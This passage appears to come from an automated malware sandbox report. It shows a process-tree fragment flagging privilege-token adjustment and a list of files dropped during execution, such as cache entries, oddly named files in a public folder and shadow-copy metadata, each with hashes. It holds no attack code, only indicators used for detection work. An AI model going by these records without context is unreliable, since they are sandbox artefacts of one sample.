                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4960
                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                    1⤵
                                                                                      PID:240

Network

MITRE ATT&CK Enterprise v6

Downloads

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_E175CA4A23AAAC6461EA10553A74FCBF
  Filesize: 746B
  MD5: 81d472a05cedae0cc51da78438bf403f
  SHA1: 2d03defd282a5e467fbaab00e3be5b23487c053b
  SHA256: 152402a3153cf9f7d2d3d9bc4fef13a582cd6ce98e5a18905a11d897fe7a9578
  SHA512: 6c37ad45e6b24077dc765a75ec141e676c4ca272a81643f6050dc8fb8665cab10899d4053c487df2b549fa3e84284765105dacee73fb974efabdf3e117ad236c

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
  Filesize: 727B
  MD5: 99accff20ca7c832511f27c37d003496
  SHA1: 3533a08c5b884a8a905afb21fbf3b677e0f9b8f1
  SHA256: af120cebcf520528b95823f7648a2819cc33152235c9bb7f6ab3f1de22b91de9
  SHA512: 4a6b09b06932b470d55006f2789df9b0cbc00fd5696b25c0db0c8c2aca2ffebea1a2eb896ff0d24e1904b190e721f6e8ed93816c205d95a9ec9eda5fdbe1007b

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_E175CA4A23AAAC6461EA10553A74FCBF
  Filesize: 408B
  MD5: 4bc233662a20ece5c8e0f9f60f034706
  SHA1: 66ce9b4d9979cdfa16f9b3e9723481c808fd7546
  SHA256: 882cb3cb900a9a6c2f4418960478051c1da22b5d59133645b0a9137ac9a0af3b
  SHA512: 5872542b517c366280309f43d9a154e3a108b287f6073e2d569bb16037f612073187ef945bd591b47244e4e8de7d0d96e475353ff92a9f3f732247c3925a4202

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
  Filesize: 412B
  MD5: ff9d392d9e2cfff9dc93a21843f56561
  SHA1: a225ce6da6da80602d8ce3f940e19a72e2186a2b
  SHA256: 234b2a4590d9d1e854add2e055373aa4611643a35a52e6fab686485762c27333
  SHA512: 4fd0030db2f71ebba7d4b9af6ccd58019656a03b8c94ca458dbe7283374ae46b6313ae8576db08b3491c0e7acd4ffaeec10ceffbd4fa4cf30d8a8ca98b0fcade

• C:\Users\Public\bjsocea
  Filesize: 3KB
  MD5: 49eac8d576681efe19b67231c07795a0
  SHA1: 9cd795e11c3078efdd008091f18e86b325f8f892
  SHA256: 331cf86f3fda9e909d1c1521acfa72574f2ce6ff74912012ae75261c0d06846c
  SHA512: 899933bdadfe1e5aaa25302e869031bee84d9931be6a9ee8f1fe9164c2f4cfc27d363a05e31606919b1e6b2d134446935e5c0cd2697c8bd02ec3c59db380d6a8

• C:\Users\Public\w8q31a55
  Filesize: 1KB
  MD5: d4187737377edd4a5fddf9ee201f8bfb
  SHA1: ef8c59d456c2a880fbeaac060629d5060dad072e
  SHA256: 0fc745584c1284541f68a628eb3754a6f0c4c99a91cdfcc698127e96920f265a
  SHA512: a682e1aa30e437a458ad880e8b8d750267b5111425c938a8d216c4df97c177d9410048d009d2f7827c5df44985bba14610e332aae3b4176efb62f570e7c5a19f

• C:\Windows\Installer\MSID7E6.tmp
  Filesize: 50KB
  MD5: 19fa3be964d43ee5eaddb1198cb34cfa
  SHA1: 08214c36b827979ff393daf669709e516b305e49
  SHA256: d7d84566e143a0fc4b838db72a58a909966c190a7c3c6eb16d50ca89ab11b373
  SHA512: 7c0b1200027e6b9ede998c0bb321ceb5427c4e6325edb79323f078653accf21be189643aaaeb472d24d5b814b9613e54bffabbba728c8f86e35bdfaad9814738

• \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
  Filesize: 18.5MB
  MD5: c864145fe5179f9ba2cf23c9a1a8f015
  SHA1: 72cc399cae75f9f82e15cce6d5328bd96fe9176a
  SHA256: 667a209e97f3b043edab5b3b683a819fd0e73aa8025738921c5b0b77bca841a3
  SHA512: 35876624040e1c7929a0330a31c07400cdcb9fa6e0657b3c67026dc5143b5c3ff040663f48cd516da20024a66a5f0250f5783aa138441b62be897cb3cdcde410

• \??\Volume{06969d78-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{40e1b798-992f-4eab-99b6-1644298cd675}_OnDiskSnapshotProp
  Filesize: 5KB
  MD5: edbc93e85544b92d4ba07dadf3fbee93
  SHA1: 4193b8c9f6ae94e22a6d24295fe63667e330cfcb
  SHA256: 1f521c13c9bca82e130c9db45fe4c1226ecf2bb8a56345bf5484637b9da90ef4
  SHA512: e2e6474a73c4fd45b7334d82447479932488cddf64df2cc64e0f5bab6fd6130b376b82837881b5ca742c76d2142d0c2f94a0d2a73adc3e3ecbc15fbc3e0c1f1e

• memory/1928-148-0x000001ADDF6E0000-0x000001ADDF6EC000-memory.dmp
  Filesize: 48KB

• memory/2408-149-0x000001D172BC0000-0x000001D172BC3000-memory.dmp
  Filesize: 12KB